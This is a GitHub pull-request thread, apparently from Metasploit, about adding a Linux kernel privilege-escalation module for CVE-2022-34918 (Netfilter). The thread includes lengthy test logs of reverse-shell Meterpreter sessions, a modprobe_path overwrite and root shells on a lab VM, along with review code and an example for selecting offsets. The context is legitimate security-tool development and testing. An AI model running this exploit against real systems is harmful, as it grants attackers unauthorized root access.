/boot/vmlinuz-5.15.0-39-lowlatency:5.15.0-39-lowlatency (buildd@lcy02-amd64-108) #42-Ubuntu SMP PREEMPT Fri Jun 10 12:00:27 UTC 2022grep: /boot/vmlinuz-5.15.0-39-lowlatency: binary file matches
/boot/vmlinuz-5.15.0-40-generic:5.15.0-40-generic (buildd@lcy02-amd64-047) #43-Ubuntu SMP Wed Jun 15 12:54:21 UTC 2022grep: /boot/vmlinuz-5.15.0-40-generic: binary file matches
/boot/vmlinuz-5.15.0-40-lowlatency:5.15.0-40-lowlatency (buildd@lcy02-amd64-072) #43-Ubuntu SMP PREEMPT Thu Jun 16 17:07:13 UTC 2022grep: /boot/vmlinuz-5.15.0-40-lowlatency: binary file matches
/boot/vmlinuz-5.15.0-41-generic:5.15.0-41-generic (buildd@lcy02-amd64-065) #44-Ubuntu SMP Wed Jun 22 14:20:53 UTC 2022grep: /boot/vmlinuz-5.15.0-41-generic: binary file matches
/boot/vmlinuz-5.15.0-41-lowlatency:5.15.0-41-lowlatency (buildd@lcy02-amd64-032) #44-Ubuntu SMP PREEMPT Wed Jun 22 15:40:35 UTC 2022grep: /boot/vmlinuz-5.15.0-41-lowlatency: binary file matches

@red0xff
Contributor Author

red0xff commented Jul 22, 2022

I added some docs, updated the check method, and added offsets for Ubuntu 22.04 kernels, thanks to @bcoles. I also tested a few kernel versions; it seems to work fine, but more testing is necessary.

Co-authored-by: bcoles <bcoles@gmail.com>
@bcoles bcoles added docs and removed needs-docs labels Jul 23, 2022
@red0xff red0xff force-pushed the add_exploit_cve-2022-34918 branch from ee9bc48 to 88d069a on July 24, 2022 23:09
@red0xff
Contributor Author

red0xff commented Aug 6, 2022

@bwatters-r7 Any updates on this?

(Should be ready for landing, please let me know if you need help at testing, or if you have more feedback)


### Included Binaries
The binary used by this exploit `data/exploits/CVE-2022-34918/ubuntu.elf` can be used separately from
Metasploit. The binary takes a single argument which is the payload or executable you wish to launch as `root`.
Contributor

@bwatters-r7 bwatters-r7 Aug 9, 2022


I love that this has started to be a thing again!

external/source/exploits/CVE-2022-34918/src/main.c (review comment, outdated and resolved)
```ruby
  # Excerpt of the module's run_payload method as shown in the review; the
  # closing `end`s cut off by the review view are restored here.
  def run_payload
    info = cmd_exec(@executable_path, @payload_path)
    info.each_line do |line|
      print_status(line.chomp)
    end
  end
```
Contributor


Minor, but this might be better as vprint_status because there's a lot of output in the C source. Another option might be to only print the output if the exploit fails. For an example, see

Contributor Author


Sometimes, the session is created, but a kernel panic follows shortly after. I've opted for vprint_status.

@bwatters-r7
Contributor

@red0xff some minor stuff, but yup, this is on my radar again.

@bwatters-r7
Contributor

Hey there @red0xff; thanks for addressing the changes! I'm in the middle of something else right now, but I'm hoping to take a look at this again next week.

@bwatters-r7
Contributor

bwatters-r7 commented Aug 26, 2022

Also, I'm assuming this is based in large part on https://github.com/randorisec/CVE-2022-34918-LPE-PoC, which is owned by @randorisec. I don't see a license file or license information in any of the files; do we have permission to use the code? Could we work with @randorisec to add a license file that would allow us to use it?
I know that @Aleknight was the author, but if they did it while employed by @randorisec, my guess is that the code belongs to them, and the easiest thing would be to put a license file in the original repo that grants us (and/or anyone) permission to use it. Either a BSD-3 or MIT license would work, and I'm happy to work with the original repo owners to get it in place. I'll also tag @jmartin-r7 because while I know theoretically what needs to happen, he's actually done it.

@randorisec

Also, I'm assuming this is based in large part on https://github.com/randorisec/CVE-2022-34918-LPE-PoC, which is owned by @randorisec. I don't see a license file or license information in any of the files; do we have permission to use the code? Could we work with @randorisec to add a license file that would allow us to use it?
I know that @Aleknight was the author, but if they did it while employed by @randorisec, my guess is that the code belongs to them, and the easiest thing would be to put a license file in the original repo that grants us (and/or anyone) permission to use it. Either a BSD-3 or MIT license would work, and I'm happy to work with the original repo owners to get it in place. I'll also tag @jmartin-r7 because while I know theoretically what needs to happen, he's actually done it.

You're right.
Yes, you have the permission to use the code.
I've added a BSD licence reference on the repo:
https://github.com/randorisec/CVE-2022-34918-LPE-PoC#license

@randorisec
Hi there,
Is that OK now (regarding the licence)?
Also, can we help with anything else?

@jmartin-tech
Contributor

@randorisec the updates look good; we can move this PR forward based on that update.

I would recommend extracting and creating a LICENSE file so GitHub will recognize it in your repository stats.

@red0xff
Contributor Author

red0xff commented Sep 6, 2022

@randorisec the updates look good; we can move this PR forward based on that update.

I would recommend extracting and creating a LICENSE file so GitHub will recognize it in your repository stats.

Done, I've added LICENSE.md.

@bwatters-r7
Contributor

I was unable to get this to work on Linux ubuntu-vm 5.11.0-41-generic #45~20.04.1-Ubuntu SMP Wed Nov 10 10:20:10 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux

msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > sessions -i 7
[*] Starting interaction with 7...

meterpreter > sysinfo
Computer     : 10.5.134.179
OS           : Ubuntu 20.04 (Linux 5.11.0-41-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > getuid
Server username: msfuser
meterpreter > shell
Process 2070 created.
Channel 1 created.
u[*] 10.5.134.179 - Meterpreter session 6 closed.  Reason: Died
name -a
Linux ubuntu-vm 5.11.0-41-generic #45~20.04.1-Ubuntu SMP Wed Nov 10 10:20:10 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
exit
meterpreter > background
[*] Backgrounding session 7...
msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > set session 7
session => 7
msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > run

[*] Started reverse TCP handler on 10.5.135.101:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Dropping pre-compiled binaries to system...
[*] Writing '/tmp/0nd0V' (765816 bytes) ...
[*] Uploading payload...
[*] Writing '/tmp/7Dcxw' (248 bytes) ...
[*] Running payload on remote system...
[*] Execution attempt #1
[*] [+] kernel version '5.11.0-41-generic #45~20.04.1-Ubuntu' detected
[*] [+] Second process currently waiting
[*] [+] Get CAP_NET_ADMIN capability
[*] [+] Netlink socket created
[*] [+] Netlink socket bound
[*] [+] Table table created
[*] [+] Set for the leak created
[*] [+] Set for write primitive created
[*] [*] Leak in process
[*] Killed
[*] Execution attempt #2
[-] Exploit failed [user-interrupt]: Rex::TimeoutError Operation timed out.
[-] Failed to delete /tmp/0nd0V: Operation timed out.
^C[-] Failed to delete /tmp/7Dcxw: 
[-] run: Interrupted
msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > [*] 10.5.134.179 - Meterpreter session 7 closed.  Reason: Died

[*] Sending stage (3020772 bytes) to 10.5.134.179
[*] Meterpreter session 8 opened (10.5.135.101:4567 -> 10.5.134.179:32974) at 2022-09-06 16:29:50 -0500

msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > 
msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > 
msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > set session 8
session => 8
msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > run

[*] Started reverse TCP handler on 10.5.135.101:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Dropping pre-compiled binaries to system...
[*] Writing '/tmp/gDfRMpTa' (765816 bytes) ...
[*] Uploading payload...
[*] Writing '/tmp/OEWxBKigGv' (248 bytes) ...
[*] Running payload on remote system...
[*] Execution attempt #1
[*] [+] kernel version '5.11.0-41-generic #45~20.04.1-Ubuntu' detected
[*] [+] Second process currently waiting
[*] [+] Get CAP_NET_ADMIN capability
[*] [+] Netlink socket created
[*] [+] Netlink socket bound
[*] [+] Table table created
[*] [+] Set for the leak created
[*] [+] Set for write primitive created
[*] [*] Leak in process
[*] Killed
[*] Execution attempt #2
[-] Exploit failed [user-interrupt]: Rex::TimeoutError Operation timed out.
[-] Failed to delete /tmp/gDfRMpTa: Operation timed out.
[-] Failed to delete /tmp/OEWxBKigGv: Operation timed out.
[-] run: Interrupted
msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > 

* };
* The last three fields are the offsets of the corresponding symbols
*/
// 22.04 LTS

I'm not passionate about changing it now that it is here and I recognize this is an artifact of the original tool, but normally I'm a fan of placing the offsets in the ruby code and passing them in as arguments. It makes expanding the target sets easier, and allows a forced exploit to run. Again, I'm not super passionate about changing it, but in the future I think that's the better paradigm.
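As an added illustration of the layout suggested in the review comment above (this is example code, not code from this PR or from the Metasploit module): the per-kernel offsets sit in a Ruby table, auto-detection picks the row matching the running kernel, a forced target overrides that, and the chosen row is handed to the dropped exploit binary on its command line instead of being compiled into it. Every offset value is a hypothetical placeholder, the argv layout (payload path first, then three hex offsets) is an assumption, and the table is keyed on both `uname -r` and the build tag from `uname -v`, because Ubuntu ships distinct builds under the same release string (the 20.04 HWE kernel in the test log carries the `~20.04.1` suffix) and those builds do not share offsets.

```ruby
require 'shellwords'

# Added example (not code from this PR or from the Metasploit module).
# Every offset below is a HYPOTHETICAL placeholder; real values must be pulled
# from the matching kernel build's System.map. The argv layout the C side is
# assumed to accept (payload path, then three hex offsets) is also an assumption.
TARGETS = [
  {
    name: 'Ubuntu 20.04 HWE, 5.11.0-41-generic',
    # Keyed on `uname -r` plus the build tag that opens `uname -v`: the same
    # release string can denote different builds with different offsets.
    uname: '5.11.0-41-generic #45~20.04.1-Ubuntu',
    offsets: [0x1111111, 0x2222222, 0x3333333] # placeholders
  },
  {
    name: 'Ubuntu 22.04, 5.15.0-25-generic',
    uname: '5.15.0-25-generic #25-Ubuntu',
    offsets: [0x4444444, 0x5555555, 0x6666666] # placeholders
  }
].freeze

# Reduce a `uname -a` line to the "release build-tag" pair the table is keyed
# on. Field 3 is `uname -r`; field 4 is the "#NN..." tag that opens `uname -v`.
def kernel_key(uname_a)
  f = uname_a.split
  raise ArgumentError, "unexpected uname output: #{uname_a.inspect}" if f.length < 4

  "#{f[2]} #{f[3]}"
end

# Pick a target. `forced` follows the module's target numbering: 0 is Auto,
# 1..n selects a row outright. Returns nil when auto-detection has no match,
# which the module's check should report as unknown rather than vulnerable.
def select_target(key, forced: 0)
  if forced != 0
    unless (1..TARGETS.length).cover?(forced)
      raise ArgumentError, "target #{forced} out of range 1..#{TARGETS.length}"
    end
    return TARGETS[forced - 1]
  end
  TARGETS.find { |t| t[:uname] == key.strip }
end

# Build the exact string the module would hand to cmd_exec. Offsets travel as
# hex so the C side can parse them with strtoull(arg, NULL, 16); Shellwords
# quoting keeps an unusual payload path from breaking the command line.
def exploit_cmdline(exe, payload, target)
  argv = [exe, payload] + target[:offsets].map { |o| format('0x%x', o) }
  Shellwords.join(argv)
end

if __FILE__ == $PROGRAM_NAME
  # Constructed input: the `uname -a` line from the 20.04 VM in the test log.
  uname_a = 'Linux ubuntu-vm 5.11.0-41-generic #45~20.04.1-Ubuntu SMP Wed Nov 10 10:20:10 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux'
  t = select_target(kernel_key(uname_a))
  puts t ? exploit_cmdline('/tmp/exploit', '/tmp/payload', t) : 'no matching target'
end
```

With this shape a new kernel is one more row in `TARGETS` and one more line in the module's `targets` list, and `set TARGET 1` still runs the binary when the check cannot read or match the uname string.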

@red0xff
Contributor Author

red0xff commented Sep 7, 2022

> (quoting @bwatters-r7's comment above in full)

It worked for me on 5.11.0-41-generic; sure, it doesn't have the best success rate, but it's still decent, and it works.
(If it hangs like that, reboot the VM, get a session again, and test the module again).

(Tested on Ubuntu Server with that kernel version)

@bwatters-r7
Contributor

After about 10 attempts and 5 reboots, I got a session:

msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > run

[*] Started reverse TCP handler on 10.5.135.101:4545 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Dropping pre-compiled binaries to system...
[*] Writing '/tmp/7MhKy' (765816 bytes) ...
[*] Uploading payload...
[*] Writing '/tmp/A7FHgU' (304 bytes) ...
[*] Running payload on remote system...
[*] Execution attempt #1
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3020772 bytes) to 10.5.134.179
[*] [+] kernel version '5.11.0-41-generic #45~20.04.1-Ubuntu' detected
[*] [+] Second process currently waiting
[*] [+] Get CAP_NET_ADMIN capability
[*] [+] Netlink socket created
[*] [+] Netlink socket bound
[*] [+] Table table created
[*] [+] Set for the leak created
[*] [+] Set for write primitive created
[*] [*] Leak in process
[+] Leak succeed     
[*] [+] kaslr base found 0xffffffff81200000
[*] [+] physmap base found 0xffff9edf00000000
[*] [+] modprobe_path changed !
[*] [+] Modprobe payload setup
[+] Leak succeed     
[*] [+] kaslr base found 0xffffffff81200000
[*] [+] physmap base found 0xffff9edf00000000
[*] [+] modprobe_path changed !
[*] [+] Modprobe payload setup
[*] [?] waitpid
[*] [?] sem_post
[*] [+++] Got root shell, should exit?
[+] A session has been created

[*] Meterpreter session 6 opened (10.5.135.101:4545 -> 10.5.134.179:41252) at 2022-09-08 08:57:01 -0500

[-] Failed to delete /tmp/7MhKy: Operation timed out.
[-] Failed to delete /tmp/A7FHgU: Operation timed out.
meterpreter > sysinfo
Computer     : 10.5.134.179
OS           : Ubuntu 20.04 (Linux 5.11.0-41-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > getuid
Server username: root
meterpreter > 

@randorisec

Hi, is there something else missing? We would love to see this module land 🤗

@bwatters-r7
Contributor

I need to get it to work again....

msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > run

[*] Started reverse TCP handler on 10.5.135.101:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Dropping pre-compiled binaries to system...
[*] Writing '/tmp/DRXksAxm9' (765816 bytes) ...
[-] Exploit failed [user-interrupt]: Rex::TimeoutError Operation timed out.
[-] run: Interrupted
msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > run

[*] Started reverse TCP handler on 10.5.135.101:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[-] Exploit failed [user-interrupt]: Rex::TimeoutError Operation timed out.
[-] run: Interrupted
msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > run

[*] Started reverse TCP handler on 10.5.135.101:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[-] Exploit failed [user-interrupt]: Rex::TimeoutError Operation timed out.
[-] run: Interrupted
msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > 
[*] Sending stage (3020772 bytes) to 10.5.134.179
[*] Meterpreter session 4 opened (10.5.135.101:4567 -> 10.5.134.179:58040) at 2022-09-27 15:55:16 -0500

msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > set session 4
session => 4
msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > run

[*] Started reverse TCP handler on 10.5.135.101:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Dropping pre-compiled binaries to system...
[*] Writing '/tmp/Qb7pg88i' (765816 bytes) ...
[*] Uploading payload...
[*] Writing '/tmp/Thi6a' (304 bytes) ...
[*] Running payload on remote system...
[*] Execution attempt #1
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3020772 bytes) to 10.5.134.179
[*] 10.5.134.179 - Meterpreter session 5 closed.  Reason: Died
[-] Exploit failed [user-interrupt]: Rex::TimeoutError Operation timed out.
[-] Meterpreter session 5 is not valid and will be closed
[-] Failed to delete /tmp/Qb7pg88i: Operation timed out.
[-] Failed to delete /tmp/Thi6a: Operation timed out.
[-] run: Interrupted
msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > [*] 10.5.134.179 - Meterpreter session 4 closed.  Reason: Died

[*] Sending stage (3020772 bytes) to 10.5.134.179
[*] Meterpreter session 6 opened (10.5.135.101:4567 -> 10.5.134.179:34242) at 2022-09-27 15:57:19 -0500

msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > set session 6
session => 6
msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > run

[*] Started reverse TCP handler on 10.5.135.101:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Dropping pre-compiled binaries to system...
[*] Writing '/tmp/U2tRChNB' (765816 bytes) ...
[*] Uploading payload...
[*] Writing '/tmp/WOqouFDu' (304 bytes) ...
[*] Running payload on remote system...
[*] Execution attempt #1
[*] [+] kernel version '5.11.0-41-generic #45~20.04.1-Ubuntu' detected
[*] [+] Second process currently waiting
[*] [+] Get CAP_NET_ADMIN capability
[*] [+] Netlink socket created
[*] [+] Netlink socket bound
[*] [+] Table table created
[*] [+] Set for the leak created
[*] [+] Set for write primitive created
[*] [*] Leak in process
[*] Killed
[*] Execution attempt #2
[*] [+] kernel version '5.11.0-41-generic #45~20.04.1-Ubuntu' detected
[*] [+] Second process currently waiting
[*] [+] Get CAP_NET_ADMIN capability
[*] [+] Netlink socket created
[*] [+] Netlink socket bound
[*] [+] Table table created
[*] [+] Set for the leak created
[*] [+] Set for write primitive created
[*] [*] Leak in process
[*] Killed
[*] Execution attempt #3
[*] [+] kernel version '5.11.0-41-generic #45~20.04.1-Ubuntu' detected
[*] [+] Second process currently waiting
[*] [+] Get CAP_NET_ADMIN capability
[*] [+] Netlink socket created
[*] [+] Netlink socket bound
[*] [+] Table table created
[*] [+] Set for the leak created
[*] [+] Set for write primitive created
[*] [*] Leak in process
[*] Killed
[*] Execution attempt #4
[*] [+] kernel version '5.11.0-41-generic #45~20.04.1-Ubuntu' detected
[*] [+] Second process currently waiting
[*] [+] Get CAP_NET_ADMIN capability
[*] [+] Netlink socket created
[*] [+] Netlink socket bound
[*] [+] Table table created
[*] [+] Set for the leak created
[*] [+] Set for write primitive created
[*] [*] Leak in process
[*] Killed
[*] Execution attempt #5
[*] [+] kernel version '5.11.0-41-generic #45~20.04.1-Ubuntu' detected
[*] [+] Second process currently waiting
[*] [+] Get CAP_NET_ADMIN capability
[*] [+] Netlink socket created
[*] [+] Netlink socket bound
[*] [+] Table table created
[*] [+] Set for the leak created
[*] [+] Set for write primitive created
[*] [*] Leak in process
[*] Killed
[-] Exploit has failed
[*] Exploit completed, but no session was created.
msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > [*] 10.5.134.179 - Meterpreter session 6 closed.  Reason: Died

[*] Sending stage (3020772 bytes) to 10.5.134.179
[*] Meterpreter session 7 opened (10.5.135.101:4567 -> 10.5.134.179:34592) at 2022-09-27 15:59:56 -0500

msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > set session 7
session => 7
msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > run

[*] Started reverse TCP handler on 10.5.135.101:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Dropping pre-compiled binaries to system...
[*] Writing '/tmp/5XWtO40CI' (765816 bytes) ...
[*] Uploading payload...
[*] Writing '/tmp/kBXUCN8Zu' (304 bytes) ...
[*] Running payload on remote system...
[*] Execution attempt #1
[-] Exploit failed [user-interrupt]: Rex::TimeoutError Operation timed out.
[-] Failed to delete /tmp/5XWtO40CI: Operation timed out.
[-] Failed to delete /tmp/kBXUCN8Zu: Operation timed out.
[-] run: Interrupted
msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > [*] 10.5.134.179 - Meterpreter session 2 closed.  Reason: Died
[*] 10.5.134.179 - Meterpreter session 7 closed.  Reason: Died

[*] Sending stage (3020772 bytes) to 10.5.134.179
[*] Meterpreter session 8 opened (10.5.135.101:4567 -> 10.5.134.179:43904) at 2022-09-27 16:04:56 -0500

msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > set session 8
session => 8
msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > run

[*] Started reverse TCP handler on 10.5.135.101:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Dropping pre-compiled binaries to system...
[*] Writing '/tmp/3AluGYr' (765816 bytes) ...
[*] Uploading payload...
[*] Writing '/tmp/sUKx6SW7' (304 bytes) ...
[*] Running payload on remote system...
[*] Execution attempt #1
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3020772 bytes) to 10.5.134.179
[*] 10.5.134.179 - Meterpreter session 9 closed.  Reason: Died
[-] Exploit failed [user-interrupt]: Rex::TimeoutError Operation timed out.
[-] Failed to delete /tmp/3AluGYr: Operation timed out.
[-] Failed to delete /tmp/sUKx6SW7: Operation timed out.
[-] run: Interrupted
msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > [*] 10.5.134.179 - Meterpreter session 8 closed.  Reason: Died

[*] Sending stage (3020772 bytes) to 10.5.134.179
[*] Meterpreter session 10 opened (10.5.135.101:4567 -> 10.5.134.179:57210) at 2022-09-27 16:09:14 -0500

msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > set session 10
session => 10
msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > run

[*] Started reverse TCP handler on 10.5.135.101:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Dropping pre-compiled binaries to system...
[*] Writing '/tmp/Hf5kkOcpf' (765816 bytes) ...
[*] Uploading payload...
[*] Writing '/tmp/Hx2Wjrwlr' (304 bytes) ...
[*] Running payload on remote system...
[*] Execution attempt #1
[-] Exploit failed [user-interrupt]: Rex::TimeoutError Operation timed out.
[-] Failed to delete /tmp/Hf5kkOcpf: Operation timed out.
[*] Meterpreter session 9 opened (10.5.135.101:4444 -> 127.0.0.1) at 2022-09-27 16:10:12 -0500
[-] Failed to delete /tmp/Hx2Wjrwlr: Operation timed out.
[-] run: Interrupted
msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > [*] 10.5.134.179 - Meterpreter session 10 closed.  Reason: Died

[*] Sending stage (3020772 bytes) to 10.5.134.179
[*] Meterpreter session 11 opened (10.5.135.101:4567 -> 10.5.134.179:57966) at 2022-09-27 16:11:26 -0500

msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > set session 11
session => 11
msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > run

[*] Started reverse TCP handler on 10.5.135.101:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Dropping pre-compiled binaries to system...
[*] Writing '/tmp/8JKI9wK' (765816 bytes) ...
[*] Uploading payload...
[*] Writing '/tmp/K7eqJ2U' (304 bytes) ...
[*] Running payload on remote system...
[*] Execution attempt #1
[-] Exploit failed [user-interrupt]: Rex::TimeoutError Operation timed out.
[-] Failed to delete /tmp/8JKI9wK: Operation timed out.
[-] Failed to delete /tmp/K7eqJ2U: Operation timed out.
[-] run: Interrupted
msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > [*] 10.5.134.179 - Meterpreter session 11 closed.  Reason: Died

[*] Sending stage (3020772 bytes) to 10.5.134.179
[*] Meterpreter session 12 opened (10.5.135.101:4567 -> 10.5.134.179:50556) at 2022-09-27 16:15:20 -0500

msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > set session 12
session => 12
msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > run

[*] Started reverse TCP handler on 10.5.135.101:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Dropping pre-compiled binaries to system...
[*] Writing '/tmp/sEEAde' (765816 bytes) ...
[*] Uploading payload...
[*] Writing '/tmp/fswYluB' (304 bytes) ...
[*] Running payload on remote system...
[*] Execution attempt #1
[-] Exploit failed [user-interrupt]: Rex::TimeoutError Operation timed out.
[-] Failed to delete /tmp/sEEAde: Operation timed out.
[-] Failed to delete /tmp/fswYluB: Operation timed out.
[-] run: Interrupted
msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > set payload linux/x64/meterpreter_reverse_tcp
payload => linux/x64/meterpreter_reverse_tcp
msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > show options

Module options (exploit/linux/local/netfilter_nft_set_elem_init_privesc):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   COMPILE    Auto             yes       Compile on target (Accepted: Auto, True, False)
   MAX_TRIES  5                yes       Number of times to execute the exploit
   SESSION    12               yes       The session to run this module on


Payload options (linux/x64/meterpreter_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.5.135.101     yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Auto


msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > [*] 10.5.134.179 - Meterpreter session 12 closed.  Reason: Died

msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > 
[*] Sending stage (3020772 bytes) to 10.5.134.179
[*] Meterpreter session 13 opened (10.5.135.101:4567 -> 10.5.134.179:54832) at 2022-09-27 16:18:14 -0500

msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > set session 13
session => 13
msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > run

[*] Started reverse TCP handler on 10.5.135.101:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Dropping pre-compiled binaries to system...
[*] Writing '/tmp/tV6ZpfjxdR' (765816 bytes) ...
[*] Uploading payload...
[*] Writing '/tmp/b4WILWg9w' (1042160 bytes) ...
[*] Running payload on remote system...
[*] Execution attempt #1
[-] Exploit failed [user-interrupt]: Rex::TimeoutError Operation timed out.
[-] Failed to delete /tmp/tV6ZpfjxdR: Operation timed out.
[-] Failed to delete /tmp/b4WILWg9w: Operation timed out.
[-] run: Interrupted
msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > [*] 10.5.134.179 - Meterpreter session 13 closed.  Reason: Died

[*] Sending stage (3020772 bytes) to 10.5.134.179
[*] Meterpreter session 14 opened (10.5.135.101:4567 -> 10.5.134.179:50242) at 2022-09-27 16:20:06 -0500

msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > set session 14
session => 14
msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > run

[*] Started reverse TCP handler on 10.5.135.101:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Dropping pre-compiled binaries to system...
[*] Writing '/tmp/fdeA1Aj' (765816 bytes) ...
[*] Uploading payload...
[*] Writing '/tmp/YZ3vR' (1042160 bytes) ...
[*] Running payload on remote system...
[*] Execution attempt #1
[*] [+] kernel version '5.11.0-41-generic #45~20.04.1-Ubuntu' detected
[*] [+] Second process currently waiting
[*] [+] Get CAP_NET_ADMIN capability
[*] [+] Netlink socket created
[*] [+] Netlink socket bound
[*] [+] Table table created
[*] [+] Set for the leak created
[*] [+] Set for write primitive created
[*] [*] Leak in process
[*] Killed
[*] Execution attempt #2
[*] [+] kernel version '5.11.0-41-generic #45~20.04.1-Ubuntu' detected
[*] [+] Second process currently waiting
[*] [+] Get CAP_NET_ADMIN capability
[*] [+] Netlink socket created
[*] [+] Netlink socket bound
[*] [+] Table table created
[*] [+] Set for the leak created
[*] [+] Set for write primitive created
[*] [*] Leak in process
[*] Killed
[*] Execution attempt #3
[*] [+] kernel version '5.11.0-41-generic #45~20.04.1-Ubuntu' detected
[*] [+] Second process currently waiting
[*] [+] Get CAP_NET_ADMIN capability
[*] [+] Netlink socket created
[*] [+] Netlink socket bound
[*] [+] Table table created
[*] [+] Set for the leak created
[*] [+] Set for write primitive created
[*] [*] Leak in process
[*] Killed
[*] Execution attempt #4
[-] Exploit failed [user-interrupt]: Rex::TimeoutError Operation timed out.
[-] Failed to delete /tmp/fdeA1Aj: Operation timed out.

@bwatters-r7
Contributor

15th time is a charm!

msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > set session 15
session => 15
msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > run

[*] Started reverse TCP handler on 10.5.135.101:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Dropping pre-compiled binaries to system...
[*] Writing '/tmp/Lrarc2Y' (765816 bytes) ...
[*] Uploading payload...
[*] Writing '/tmp/dldRHofZp' (1042160 bytes) ...
[*] Running payload on remote system...
[*] Execution attempt #1
[*] [+] kernel version '5.11.0-41-generic #45~20.04.1-Ubuntu' detected
[*] [+] Second process currently waiting
[*] [+] Get CAP_NET_ADMIN capability
[*] [+] Netlink socket created
[*] [+] Netlink socket bound
[*] [+] Table table created
[*] [+] Set for the leak created
[*] [+] Set for write primitive created
[*] [*] Leak in process
[+] Leak succeed     
[*] [+] kaslr base found 0xffffffffa0000000
[*] [+] physmap base found 0xffff98e800000000
[*] [+] modprobe_path changed !
[*] [+] Modprobe payload setup
[+] Leak succeed     
[*] [+] kaslr base found 0xffffffffa0000000
[*] [+] physmap base found 0xffff98e800000000
[*] [+] modprobe_path changed !
[*] [+] Modprobe payload setup
[*] [?] waitpid
[*] [?] sem_post
[*] [+++] Got root shell, should exit?
[+] A session has been created
[*] Meterpreter session 16 opened (10.5.135.101:4444 -> 10.5.134.179:57886) at 2022-09-27 16:27:47 -0500

[-] Failed to delete /tmp/Lrarc2Y: Operation timed out.
[-] Failed to delete /tmp/dldRHofZp: Operation timed out.

meterpreter > 
meterpreter > sysinfo
Computer     : 10.5.134.179
OS           : Ubuntu 20.04 (Linux 5.11.0-41-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > getuid
Server username: root
meterpreter > 

@bwatters-r7 bwatters-r7 merged commit e27dbd2 into rapid7:master Sep 27, 2022
@bwatters-r7
Contributor

Release Notes

This is a local-privilege escalation exploit targeting CVE-2022-34918, a vulnerability in the Netfilter component of the Linux kernel.

